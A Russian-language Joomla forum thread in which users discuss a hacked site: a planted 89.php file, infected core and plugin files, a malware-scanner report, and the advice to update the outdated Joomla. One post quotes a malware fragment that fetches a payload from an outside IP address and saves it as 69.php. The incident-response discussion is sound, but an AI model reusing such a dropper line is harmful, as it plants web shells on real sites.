Форум русской поддержки Joomla!® CMS
10.12.2016, 12:53:30 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Оставили подарок в корневом каталоге сайта

 (Прочитано 194 раз)
0 Пользователей и 1 Гость смотрят эту тему.
likrion
Завсегдатай
*****

Репутация: +127/-2
Offline Offline

Пол: Мужской
Сообщений: 752



« : 07.09.2016, 17:20:55 »

файл 89.php
Показать текстовый блок

не забывайте обновлять систему
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2289



« Ответ #1 : 07.09.2016, 18:03:28 »

А шелл нашли, который этот файл создал?
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #2 : 07.09.2016, 18:26:39 »

А этот файл 69.php на другом сервере ?
Код:
http://85.185.123.123/images/.x/x.txt','./69.php'
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #3 : 07.09.2016, 19:02:30 »

@likrion
он такой красивый должен быть не один
А этот файл 69.php на другом сервере ?
Код:
http://85.185.123.123/images/.x/x.txt','./69.php'
скорей всего на том что и 89
Записан
likrion
Завсегдатай
*****

Репутация: +127/-2
Offline Offline

Пол: Мужской
Сообщений: 752



« Ответ #4 : 07.09.2016, 19:26:31 »

Показать текстовый блок

* AI-BOLIT-REPORT.zip (9.19 Кб - загружено 2 раз.)
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #5 : 07.09.2016, 19:49:41 »

Версия php какая?

Со второй строчки все плохое скорее всего.

Версии найденных CMS
Joomla v3.3.3

Обновляться надо. Как видим RSFirewall бесполезен.
Записан
likrion
Завсегдатай
*****

Репутация: +127/-2
Offline Offline

Пол: Мужской
Сообщений: 752



« Ответ #6 : 07.09.2016, 20:14:51 »

php 5.6.12, но сканировали сайт очень долго, на протяжении полугода....это первый взломанный у меня сайт..и наверное это станет сильным пинком для сознания онлайн firewall для сайтов..один неверный запрос и IP будет блокироваться на серверном уровне...надо уже прекращать этот бред и делать автоматику по сбору уязвимостей бессмысленной
« Последнее редактирование: 07.09.2016, 20:47:40 от likrion » Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #7 : 07.09.2016, 20:31:37 »

Со второй строчки все плохое скорее всего.
Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?
Записан
likrion
Завсегдатай
*****

Репутация: +127/-2
Offline Offline

Пол: Мужской
Сообщений: 752



« Ответ #8 : 07.09.2016, 20:45:23 »

Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?
нет
Записан
likrion
Завсегдатай
*****

Репутация: +127/-2
Offline Offline

Пол: Мужской
Сообщений: 752



« Ответ #9 : 07.09.2016, 21:01:18 »

сайт.ру/libraries/library.php

Показать текстовый блок

* library.zip (30.27 Кб - загружено 0 раз.)
Записан
likrion
Завсегдатай
*****

Репутация: +127/-2
Offline Offline

Пол: Мужской
Сообщений: 752



« Ответ #10 : 07.09.2016, 21:06:03 »

сайт.ру/plugins/authentication/joomla/joomla.php

в шапке файла

Показать текстовый блок


* joomla.zip (2.33 Кб - загружено 0 раз.)
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #11 : 07.09.2016, 21:48:05 »

Как видим RSFirewall бесполезен.
Я еще примерно пол года назад, где то тут в темах скидывал моменты обхода этого фаервола, а те кто проливают шелы, у них подобные моменты на вооружения, тут постоянно следить за сайтом надо....
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet